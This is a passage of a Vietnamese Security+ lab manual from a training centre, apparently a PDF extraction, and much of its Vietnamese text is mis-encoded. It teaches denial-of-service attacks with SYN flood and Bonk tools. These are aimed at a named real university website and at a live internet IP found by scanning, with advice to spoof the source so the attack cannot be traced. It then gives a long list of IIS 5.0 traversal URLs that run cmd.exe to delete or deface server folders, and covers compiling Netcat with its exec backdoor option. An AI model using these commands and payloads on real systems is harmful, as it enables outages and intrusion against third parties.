  37. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Choïn Log all packets and infos trong menu Logging ñeå save nhöõng file logs chöùa caùc goùi baét ñöôïc laïi - Ñeå coù theå ñoïc ñöôïc caùc goùi döôùi daïng maõ hoùa ñoù, trong cöûa soå console, goõ leänh # etterlog –p –k –i –ascii logfile.eci | less 4. Tính Naêng Cuûa Ettercap Ettercap cung caáp cho ta moät soá plug-in, baèng caùch choïn nhöõng plug-in naøy, ta coù theå öùng duïng moät soá tính naêng quan troïng cuûa ettercap Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 33
  38. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 34
  39. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ngoaøi ra Ettercap coøn coù 2 plug-in raát quan troïng laø arpcop vaø leech Noù cho pheùp ta coù theå duøng chính Ettercap ñeå baûo veä maùy mình tröôùc caùc chöông trình sniffer khaùc treân maïng 1. Arpcop : Neáu nghi ngôø ai ñoù ñang “nghe leùn” treân maïng, baïn khôûi ñoäng ettercap vaø choïn plug-in naøy, ñoái töôïng söû duïng ettercap hay dsniff ta vaãn coù theå doø tìm ñöôïc, luùc ñoù moät cöûa soå môùi seõ hieån thò nhöõng maùy tính ñang chaïy caùc chöông trình spoofing arp treân maïng. 2. Leech : Khi xaùc nhaän ñöôïc ñoái töôïng taán coâng, ta coù theå tieán haønh coâ laäp maùy tính naøy khoûi maïng ngay laäp töùc baèng caùch söû duïng plug-in naøy. Coøn coù theå duøng ettercap ñeå phaùt hieän caùc maùy bò nhieãm virus ñang phaùt taùn treân maïng roài coâ laäp chuùng baèng leech, sau ñoù dieät baèng caùc chöông trình choáng virus raát hieäu quaû. Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 35
  40. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bai 4: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS I. Tấn coâng trong mạng LAN bằng HUC Tool 1 – Giôùi thieäu veà DOS Nhö chuùng ta bieát DOS (Denial Of Service) –taán coâng töø choái dòch vuï laø 1 hình thöùc taán coâng göûi caùc request lieân tuïc vaøo server chieám resource vaø bandwitdh cuûa server vôùi cöôøng ñoä lôùn laøm cho server khoâng kòp ñaùp öùng daãn ñeán haäu quaû server seõ bò overload vaø down. Trong baøi lab naøy, chuùng ta seõ thöïc hieän Syn Flood – göûi lieân tuïc caùc goùi Syn vaøo 1 PC nhaèm muïc ñích laøm cho PC ñoù ko ñaùp öùng kòp vaø down. 2 – Sô ñoà moâ hình Syn flood attack: Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 33
  41. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN ÔÛ sô ñoà treân, maùy attacker beân traùi seõ thöïc hieän Syn Flood vaøo server.Sau 1 thôøi gian taán coâng lieân tuïc, server (victim) seõ bò down vaø khoâng theå ñaùp öùng caùc request cuûa User ñöôïc nöõa. 3 – Coâng cuï caàn coù cho baøi lab : Syn Flood tools. 4 – Caùc böôùc tieán haønh: Sau khi coù chöông trình syn flood roài baïn giaûi neùn vaøo ôû C:\> ,khôûi ñoäng CMD Tröôùc tieân caàn kieám tra keát noái ñeán maùy seõ taán coâng, ví duï ôû ñaây seõ taán coâng tröïc tieáp vaøo router ADSL. Tröôùc tieân kieåm tra keát noái giöõa PC vaø router ADSL: Nhö vaäy laø PC chuùng ta ñang keát noái vôùi router ADSL qua defautl gateway laø 192.168.1.1 Tieáp theo ta seõ taán coâng Syn Flood Router ADSL baèng coång defautl gateway: khôûi ñoäng chöông trình Syn flood baèng CMD Caâu leänh taán coâng: C:\>Syn * Löu yù: IP vaø Port coù theå khai baùo giaû ñeå nôi bò taán ko coâng khoâng theå truy ra ñòa chæ thaät cuûa mình. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 34
  42. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ví duï: C:\>Syn 10.0.0.155 8080 192.168.1.1 80 ÔÛ ví duï treân 10.0.0.155 laø ñòa chæ giaû vaø port 8080 cuõng laø port giaû 192.168.1.1 laø IP cuûa defautl gateway vaø port 80 laø port seõ göûi nhöõng goùi Syns ÔÛ hình treân laø quaù trình ñang Syn Flood ñeán Router ADSL.Vôùi 1 soá Router hoaëc server toát , ñeå vieäc taán coâng doàn daäp hôn baïn haõy môû nhieàu cöûa soå CMD vaø taán coâng cuøng luùc. Vaø ñaây laø keát quaû cuûa cuoäc taán coâng: Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 35
  43. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Router ADSL hoøan toaøn cheát vaø khoâng theå truy caäp vaøo Internet ñöôïc nöõa. Quaù trình Syn Flood seõ vaãn tieáp dieãn lieân tuïc cho ñeán khi baïn muoán keát thuùc baèng toå hôïp phím Ctrl + C. 5 – Nhaän xeùt: Syn Flood attack laø 1 hình thöùc taán coâng raát ñôn giaûn nhöng höõu hieäu.Tuy nhieân noù chæ coù taùc duïng vôùi caùc client hoaëc Router ADSL nhoû vaø khoâng coù firewall.Coøn ñoái vôùi caùc server lôùn hoaëc ñöôïc Firewall baûo veä thì seõ duøng 1 hình thöùc attack khaùc laø Ddos. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 36
  44. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 5 :TẤN CÔNG BẰNG BONK TOOL Ñieàu kieän thöïc hieän: Baêng thoâng source phaûi lôùn hôn baêng thoâng destination. Phaàn meàm Bonk. Thöïc hieän nhö sau: Muïc tieâu thöïc hieän : DoS website : www.daihocvanhien.edu.vn Thöïc hieän leänh ping www.daihocvanhien.edu.vn ñeå bieát ñöôïc ñòa chæ IP Web server giaû söû laø 69.16.229.79. Tài liệu hướng dẫn thực hành Security+.Trung tâm đào tạo an ninh mạng ATHENA. 37
  45. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ta vaøo thö muïc chöùa phaàn meàm bonk sau ñoù tieán haønh Ping of Death ñòa chæ 69.16.229.79 baèng caùch ñaùnh leänh bonk 69.16.229.79 –t . Ta nhaän thaáy Count : 1392296 chæ ra taïi thôøi ñieåm naøy coù 1392296 löôït truy caäp vaø website naøy vaø neáu ñeå trong thôøi gian daøi theâm 1 tí thì con soá naøy seõ taêng leân raát nhanh sau ñoù website seõ bò ngheõn vaø daãn ñeán vieäc khoâng truy caäp ñöôïc. Tài liệu hướng dẫn thực hành Security+.Trung tâm đào tạo an ninh mạng ATHENA. 38
  46. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 6: TẤN CÔNG DoS TRÊN MÔI TRƯỜNG INTERNET 1 – Giôùi thieäu: ÔÛ baøi tröôùc ta ñaõ nghieân cöùu qua kyõ thuaät taán coâng Dos baèng coâng cuï Syn Flood Attack trong maïng Lan.Trong baøi naøy chuùng ta seõ vaãn duøng Syn Flood attack ñeå taán coâng nhöng ko phaûi ôû maïng Lan maø taán coâng vaøo 1 ñòa chæ trong maïng Internet. 2 – Coâng cuï caàn coù trong baøi lab: Trong baøi naøy chuùng ta seõ keát hôïp caû 2 baøi 1 vaø 2.Töùc laø chuùng ta seõ duøng Super Scan ñeå queùt 1 IP trong Internet, sau ñoù duøng Syn flood ñeå taán coâng vaøo IP ñoù. - Super Scan - Syn Flood Attack 3 – Tieán haønh: Tröôùc tieân ta seõ choïn 1 ñoái töôïng baát kì baèng coâng cuï Super Scan - Khôûi ñoäng Super Scan vaø queùt 1 range IP: Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 39
  47. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Sau khi queùt 1 range töø 58.186.35.1 -> 58.186.35.50 ta thaáy raát nhieàu IP ñang hoïat ñoäng vaø choïn 1 IP ñang môû port 80 laø 58.186.35.35 Ta kieåm tra keát noái ñeán IP naøy: Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 40
  48. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ok, keát noái thaønh coâng , sau ñoù tieáp tuïc xem keát noái qua port 80 laø port http: Vaäy laø moïi keát quaû töø Super Scan ñeàu ñöôïc xaùc thöïc. Böôùc tieáp theo ta seõ duøng Syn Flood Attack taán coâng vaøo IP naøy. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 41
  49. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Cuối cuøng kết quả của cuộc tấn coâng 4 – Nhaän xeùt: Cuõng gioáng nhö Syn Flood Attack trong maïng Lan nhöng taàm hoaït ñoäng seõ roäng hôn trong maïng Internet.Coù nghóa laø baïn coù theå ngoài ôû nhaø ñeå taán coâng vaøo 1 IP ôû raát xa.Tuy nhieân khoâng phaûi luùc naøo cuõng nhö yù, 1 soá nôi söû duïng Router ADSL coù chöùc naêng choáng Dos hoaëc coù firewall thì khoâng theå aùp duïng Syn flood ñöợc. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 42
  50. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 7: TẤN CÔNG DỰA TRÊN LỖI IIS5.0 1. Giới thiệu: Cách tấn công này dựa trên lỗi lập trình của hệ thống chạy web server của Microsoft Windows IIS 5.0. Lỗi này đã được Microsoft khắc phục trong các phiên bản về sau. 2. Các bước thực hiện như sau: Böôùc 1: Để thực hiện bài lap này cần phải có một server cài đặt hệ điều hành windows server 2000 và IIS 5.0 Ñaàu tieân ta caàn xaùc ñònh ñòa chæ IP cuûa web laø gì? Baèng caùch vaøo start -> run -> cmd : Giaû söû muoán tìm ñòa chæ web : www.daihocyduoc.edu.vn ta nhaäp: C:\>ping www.daihocyduoc.edu.vn hay C:\>nslookup www.daihocyduoc.edu.vn Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 42
  51. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN ta seõ nhaän ñöôïc ñòa chæ IP cuûa website:www.daihocyduoc.edu.vn giaû söû laø:192.168.1.34 Böôùc 2: Môû IE treân thanh address nhaäp 1 doøng leänh khai thaùc loãi IIS vaøo (raát nhieàu loãi seõ ñöôïc lieät keâ ôû cuoái baøi vieát) Sau doù ta coù theå thöïc hieän caùc thao taùc nhö ñang thöïc hieän treân cmd baèng caùch thay ñoåi caùc leänh ôû cuoái . Ví duï: /c+md+test+c:\ ñeå taïo folder test. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 43
  52. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN /c+cd+winnt+c:\vaøo folder winnt. Vaäy laø ta coù theå delete caùc folder chính nhö winnt , inetpub khieán cho web server bò treo vaø neáu keû taán coâng coù aùc yù thì se deface luoân caû operating system. Böôùc 3:Ñaây laø 1 soá loãi phoå bieán treân web server söû duïng IIS5.0. Một số Url'slỗi mẫu: /msadc/ %255c / %255c / %255c /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %255c /winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /iisadmpwd/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir +c:\ /cgi-bin/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c:\ /samples/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /_vti_cnf/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /adsamples/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir +c:\ /scripts/ %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c0%9v /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c0%qf /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c1%8s /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 44
  53. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %255c %255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/root.exe?/c+dir+c:\ /scripts/eyehack.exe?/c+dir+c:\ /scripts/sensepost.exe?/c+dir+c:\ /iisadmpwd/root.exe?/c+dir+c:\ /iisadmpwd/eyehack.exe?/c+dir+c:\ /iisadmpwd/sensepost.exe?/c+dir+c:\ /cgi-bin/root.exe?/c+dir+c:\ /cgi-bin/eyehack.exe?/c+dir+c:\ /cgi-bin/sensepost.exe?/c+dir+c:\ /scripts/ %255c /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %255c %255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %252f %252fwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %255c / %255c / %255c /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c+d ir+c:\ /scripts/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+dir +c:\ Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 45
  54. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN /scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+ dir+c:\ /_vti_bin/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /_vti_bin/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c +dir+c:\ /_vti_bin/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+d ir+c:\ /_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c:\ /iisadmpwd/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir +c:\ /iisadmpwd/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe? /c+dir+c:\ 6 /iisadmpwd/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c +dir+c:\ /iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe ?/c+dir+c:\ /cgi-bin/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c:\ /cgi- bin/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c+dir+c :\ /cgi- bin/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+dir+c:\ /cgi- Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 46
  55. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+ c:\ /cgi-bin/ %255c %255cwinnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %255c / %255c / %255c /winnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %255c / %255c / %255c /winnt/system32/cmd.exe?/c+dir+c:\ msadc/ %255c %255c %255c %255cwinnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c+d ir+c:\ /msadc/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+dir +c:\ /msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+ dir+c:\ /_vti_cnf/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /_vti_cnf/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c +dir+c:\ /_vti_cnf/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+d ir+c:\ /_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c:\ /samples/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir+c: \ /samples/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe?/c +dir+c:\ Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 47
  56. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN /samples/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c+d ir+c:\ /samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c:\ /adsamples/ %255c %255c %255c %255c %255c /winnt/system32/cmd.exe?/c+dir +c:\ /adsamples/ %255c %255c %255c %255c %255c %255cwinnt/system32/cmd.exe? /c+dir+c:\ /adsamples/ %252f %252f %252f %252f %252f %252fwinnt/system32/cmd.exe?/c +dir+c:\ /adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe ?/c+dir+c:\ /scripts/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c +dir+c:\ /scripts/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/c md.exe?/c+dir+c:\ /_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/c md.exe?/c+dir+c:\ /_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/ c+dir+c:\ /iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.ex e?/c+dir+c:\ /iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system3 2/cmd.exe?/c+dir+c:\ /cgi- bin/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.e Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 48
  57. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN x?/c+dir+c:\ /cgi- bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+dir +c:\ /msadc/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cm d.exe?/c+dir+c:\ /_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/ c+dir+c:\ /_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/c md.exe?/c+dir+c:\ /samples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/ c+dir+c:\ /samples/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/c md.exe?/c+dir+c:\ /adsamples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.ex e?/c+dir+c:\ 7 /adsamples/ %c0%af %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system3 2/cmd.exe?/c+dir+c:\ /scripts/ %%35c %%35cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %%35%63 %%35%63winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %25%35%63 %25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/ %%35c %%35c %%35c %%35c %%35c /winnt/system32/cmd.exe?/c+di r+c:\ /_vti_bin/ %%35%63 %%35%63 %%35%63 %%35%63 %%35%63 /winnt/system Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 49
  58. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN 32/cmd.exe?/c+dir+c:\ /_vti_bin/ %25%35%63 %25%35%63 %25%35%63 %25%35%63 %25%35%63 / winnt/system32/cmd.e xe?/c+dir+c:\ /cgi-bin/ %%35c %%35cwinnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %%35%63 %%35%63winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %25%35%63 %25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %%35c / %%35c / %%35c /winnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %%35%63 / %%35%63 / %%35%63 /winnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %25%35%63 / %25%35%63 / %25%35%63 /winnt/system32/cmd.exe?/c+ dir+c:\ /msadc/ %%35c %%35c %%35c %%35cwinnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %%35%63 %%35%63 %%35%63 %%35%63winnt/system32/cmd.exe?/c+ dir+c:\ /msadc/ %25%35%63 %25%35%63 %25%35%63 %25%35%63winnt/system32/cm d.exe?/c+dir+c:\ /cgi-bin/ %e0%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %f0%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %f8%80%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %fc%80%80%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /msadc/ %e0\%80\%af / \%e0\%80\%af / \%e0\%80\%af /winnt/system32/cmd.exe ?/c+dir+c:\ /msadc/ %e0%80%af / %e0%80%af / %e0%80%af /winnt/system32/cmd.exe?/c+d Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 50
  59. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN ir+c:\ /msadc/ %e0\%80\%af / \%e0\%80\%af / \%e0\%80\%af /winnt/system32/cmd.exe ?/c+dir+c:\ /scripts/ %e0%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %f0%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %f8%80%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %fc%80%80%80%80%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ /scripts %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %c1%pc /winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/ %c1%af /winnt/system32/cmd.exe?/c+dir+c:\ Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 51
  60. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 8:Netcat 1. Giới thiệu Netcat là một công cụ cho phép đọc và ghi dữ liệu của các kết nối thông qua mạng. Netcat sử dụng giao thức TCP và UDP. Netcat được thiết kế như là một công cụ “back-end” vô cùng hiệu quả mà có thể điều khiển trực tiếp hoặc bị điều khiển một cách tự động thông qua các script. Cùng một thời điểm netcat có thể giả lập nhiều loại kết nối để có thể khai thác các lỗi của hệ thống mạng, khai thác các lỗ hổng của các dịch vụ chạy trên mạng như web server, hệ điều hành, 2. Biên dịch Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. - hiệu chỉnh file netcat.c bằng vi: vi netcat.c + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: ./nc -h - nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":." PATH=/sbin:/usr/sbin: :. Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong. 3. Các tùy chọn của Netcat Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số: C:>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, -h this cruft Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 52
  61. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] * Cú pháp: - chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2] - chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng] * Một số tùy chọn: -d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar) -e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe -h gọi hướng dẫn -i secs 